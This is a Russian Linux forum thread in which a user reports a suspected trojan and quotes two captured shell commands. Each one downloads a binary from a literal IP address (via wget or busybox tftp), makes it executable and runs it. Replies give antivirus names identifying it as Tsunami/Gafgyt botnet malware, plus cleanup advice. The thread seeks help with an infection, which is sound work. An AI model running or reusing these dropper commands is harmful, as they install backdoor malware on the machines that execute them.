LINUX.ORG.RU

Троян lolcunt

 ,


2

2

Кажется, я подхватил какой-то троян. Слушал трафик и заметил там странную вещь:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://95.211.217.225/lolcunt; chmod 777 lolcunt; ./lolcunt; rm -rf lolcunt

Или.

cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh

Если перейти по ссылке http://95.211.217.225/lolcunt, там лежит файл в формате elf. Как можно эту дрянь убить?

Ответ на: комментарий от newpunkies

Проверял. Ничего не находит. Есть только несколько предупреждений.

[14:30:19] Warning: Suspicious file types found in /dev:
[14:30:19] /dev/.udev/rules.d/root.rules: ASCII text
[14:30:19] Checking for hidden files and directories [ Warning ]
[14:30:19] Warning: Hidden directory found: /etc/.java: directory
[14:30:19] Warning: Hidden directory found: /dev/.udev: directory
[14:30:19] Warning: Hidden file found: /dev/.initramfs: symbolic link to `/run/initramfs'

vasya256 ()
Antivirus	Result	                        Update
Avast	        ELF:Tsunami-DC [Trj]	        20160827
ESET-NOD32	a variant of Linux/IRCBot.K	20160826
Fortinet	ELF/Gafgyt.MIPS!tr	        20160827
Kaspersky	HEUR:Backdoor.Linux.Tsunami.bm	20160827
Qihoo-360	Win32/Trojan.86d	        20160827

Не Mint?

greenman ★★★★★ ()
Последнее исправление: greenman (всего исправлений: 1)

Делай бэкап данных, переустанавливай ОС, восстанавливай данные из бэкапа

deadNightTiger ★★★★ ()

cp /bin/sh .;cat min >sh;chmod 777 sh;./sh

Неужели это ещё где-то прокатывает?

no-such-file ★★★★★ ()

Вот тебе и Mint. Всегда знал, что овно.

das_tier ★★★★★ ()

Если оно было запущено из-под рута, то переустановка системы. Если в твоем ядре существуют уязвимости, позволяющие повысить привилегии, то тоже переустановка.

Если было запущено из-под ограниченного пользователя - то достаточно посмотреть, что этот пользователь мог сделать в системе. Сразу же посмотри, например, крон - /var/spool/cron/*, и /tmp, /var/tmp. Имя этого пользователя также укажет на то, каким именно способом малварь проникла в систему.

Deleted ()

ссылка не открывается :( тс, поправь линк

upcFrost ★★★★★ ()
Ответ на: комментарий от Qwentor

блин, ну если ты уже скачал - выложи на шару. я даже дизасм открыть успел, а тут ссылка битая

upcFrost ★★★★★ ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.